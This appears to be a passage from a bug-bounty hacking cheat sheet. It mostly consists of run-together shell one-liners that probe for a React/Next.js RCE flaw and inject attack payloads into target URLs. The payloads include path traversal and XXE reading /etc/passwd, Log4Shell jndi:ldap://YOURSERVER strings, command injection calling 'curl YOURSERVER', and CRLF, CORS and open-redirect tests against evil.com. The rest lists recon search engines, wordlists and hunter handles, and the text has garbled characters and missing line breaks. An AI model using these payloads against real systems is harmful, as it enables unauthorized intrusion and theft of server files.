-j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt
β οΈ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | β Fix: Update to React 19.0.1/19.1.2/19.2.1π― Key Detection: Apps accepting
Next-Actionheader + RSC deserialization = Potential RCE
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txtcat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txtcat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txtcat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txtcat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txtcat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silentcat alive.txt | xargs -I@ gowitness single @ -o screenshots/cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txtcurl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txtcat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txtcat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txtcat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txtcat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txtcat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txtcat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txtcat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txtcurl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"| Engine | Link | Description |
|---|---|---|
| Shodan | shodan.io | IoT & device search |
| Censys | censys.io | Internet scan data |
| Fofa | fofa.info | Cyberspace search |
| ZoomEye | zoomeye.org | Cyberspace mapping |
| Hunter | hunter.how | Asset discovery |
| Netlas | netlas.io | Attack surface |
| GreyNoise | greynoise.io | Internet scanners |
| Onyphe | onyphe.io | Cyber defense |
| CriminalIP | criminalip.io | Threat intel |
| FullHunt | fullhunt.io | Attack surface |
| Quake | quake.360.net | Cyberspace search |
| Leakix | leakix.net | Leak detection |
| URLScan | urlscan.io | URL analysis |
| DNSDumpster | dnsdumpster.com | DNS recon |
| crt.sh | crt.sh | Certificate search |
| SecurityTrails | securitytrails.com | DNS history |
| Pulsedive | pulsedive.com | Threat intel |
| VirusTotal | virustotal.com | File/URL analysis |
| PublicWWW | publicwww.com | Source code search |
| Grep.app | grep.app | GitHub code search |
| Wordlist | Link | Use Case |
|---|---|---|
| SecLists | GitHub | Everything |
| FuzzDB | GitHub | Fuzzing |
| Assetnote | wordlists.assetnote.io | Web content |
| OneListForAll | GitHub | Combined |
| jhaddix all.txt | GitHub | Directories |
| commonspeak2 | GitHub | Real-world |
- Web Application Hacker's Handbook
- Real-World Bug Hunting by Peter Yaworski
- Bug Bounty Bootcamp by Vickie Li
| Hunter | Hunter | Hunter |
|---|---|---|
| @bt0s3c | @MrCl0wnLab | @stokfredrik |
| @Jhaddix | @TomNomNom | @NahamSec |
| @zseano | @pry0cc | @pdiscoveryio |
| @jeff_foley | @haaborern | @0xacb |
